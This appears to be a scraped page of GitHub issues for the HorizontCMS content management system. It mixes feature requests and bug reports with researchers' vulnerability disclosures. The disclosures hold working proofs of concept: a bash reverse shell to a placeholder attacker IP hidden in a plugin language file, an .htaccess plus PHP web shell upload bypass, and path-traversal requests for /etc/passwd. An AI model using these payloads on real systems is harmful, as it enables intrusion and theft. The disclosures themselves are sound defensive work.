ttimot24 / horizontcms Goto Github PK

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution via uploading a malicious Plugin file via Plugins upload functionality.

Reproduction of the Issue

1. Login to the admin panel (http:///admin/login)
2. Prepare the malicious plugin file (We used a sample GoogleMaps (https://github.com/ttimot24/GoogleMaps) file and modified the "/resources/lang/en/message.php" to introduce our own PHP code)

<?php 

$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp/<Attacker IP>/9001 0>&1'");

return [
        'successfully_added_location' => $shell, //'Location added succesfully!',
        'successfully_deleted_location' => 'Location deleted succesfully!',
        'successfully_set_center' => 'Location is successfully set as map center!'
];

3. Zip the GoogleMaps plugin folder and upload it via Plugins functionality in the admin portal.
4. Install & activate the Plugins
5. Using "Add location" add an arbitrary location and click "Save" --> When its condition is met for "successfully_added_location," it will run our code ($shell) instead of printing out the original message 'Location added succesfully!'

Screenshots

• Modifying the message.php file in the sample GoogleMaps plugin file:
  

• Zip and upload the GoogleMaps plugin:

$ zip -r google.zip GoogleMaps

• Install --> Activate --> Google Maps Plugin is created in the menu bar:
  

• Add location --> Click Save (to initiate the message.php code)
  
  

• Listener Receiving a Reverse Shell
  

Root Cause

• The application is taking an arbitrary plugin file and execute the user supplied PHP code without proper sanitization.

Please let us know if you have any questions or need further information. Thanks.

Daniel Min & Chi Tran

Under Media > Header Images I have added two pictures to the "Currently on the slider:" but encountered two issue:

• The time interval between the change of two picture is too long
• The change between pictures feels sluggish - mostly because the pictures are different size (probably this will fix #11)

There is no way for me to update the Title icon. Can you add it in the future please?

Dear Ttimot24,

thank you very much for working on the CMS, I would like to see the features you have build by following your links:
Frontend: https://horizontcms.herokuapp.com/
Backend: https://horizontcms.herokuapp.com/admin
Unfortunately that leads only to a installation page and I'm not aware of your MySQL settings,....

Thank you for having a look.

The youtube part working well with youtube.com links but when I accidentally add a youtu.be link the whole Youtube part dies and can only see a exception when clicking on the menu. Only way to revert this is to delete the bad link from DB.

Version：HorizontCMS v1.0.0-beta-2

Submit date: 2022-02-13

Description：Arbitrary file download vulnerability

POC：

GET /admin/file-manager/download?file=storage/images/header_images/../../../../../../../../etc/passwd HTTP/1.1

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution via uploading a .htaccess and *.hello files using the Media Files upload functionality. The original file upload vulnerability (CVE-2020-27387) was remediated by restricting the PHP extensions; however, we confirmed that the filter was bypassed via uploading an arbitrary .htaccess and *.hello files in order to execute PHP code to gain RCE.

Reproduction of the Issue

1. Login to the admin panel (http:///admin/login)
2. Go to "Media" --> "Files"
3. Upload the following file --> Rename the file name as ".htaccess"

AddType application/x-httpd-php .hello

4. Upload another following file --> Rename the file name as "test.hello"

<?php system($_GET['cmd']); ?>

5. Go to http://<HorizontCMS IP/storage/test.hello?cmd= for RCE

Screenshots

• Upload files and rename them:
  

• Gain RCE
  

Root Cause

• Allowing an arbitrary file & rename functionality is not properly sanitizing the file extension.

Recommendations

• Re-work on file upload function where they should always check for MIME-Type and file extension
• Avoid leaving the file upload folder ("/storage") open

Please let us know if you have any questions or need further information. Thanks!

Daniel Min & Chi Tran

Themes upload function will allow uploading zip file and extract content to /themes/ directory.

If attacker send a zip file contain malicious php, they can executing the PHP file with http://URL/themes/malicious.php

The demo is not opening. If this project is managed properly, this will be a hit in no time. I opened this project just because it says "Alternative to octobercms"

It is really hard to adjust the banner to the header and there is no info on what should be the header image size in ideal cases.

Please add a message/validation if I am adding big pictures for a blog post (which can mess up the page layout) or create and option where I can resize the image (manually or automatically).

Where can i find the home blade and the admin blades !!

Plugins won't show browse server.

Hey there!

I belong to an open source security research community, and a member (@dota-st) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

When I have similar images uploaded for header images it is hard to differentiate them. It would be useful to add the filenames

The Activate button should be greyed out (unaccessible) if it is the currently active theme.

Under Pages > Page list when you click on the "Order" button it creates a Order column on every click. None of these added order columns are functioning, so the whole order function is not working.

The File Manager has vulnerable with Directory traversal. PoC link:

http://horizontcms.herokuapp.com/admin/file-manager/index?path=/../../../../../&mode=embed&CKEditor=editor&CKEditorFuncNum=1&langCode=en

username: admin
password: admin